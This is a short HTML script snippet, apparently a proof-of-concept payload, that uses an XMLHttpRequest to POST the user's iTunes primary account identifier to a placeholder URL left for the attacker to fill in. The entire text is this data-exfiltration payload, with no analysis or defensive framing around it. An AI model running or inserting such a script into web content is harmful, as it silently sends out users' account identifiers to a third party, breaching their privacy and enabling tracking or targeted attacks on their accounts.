<script> var xhttp = new XMLHttpRequest(); xhttp.open("POST", "Insert the URL to POST to here.", true); xhttp.send(iTunes.primaryAccount?.identifier); </script>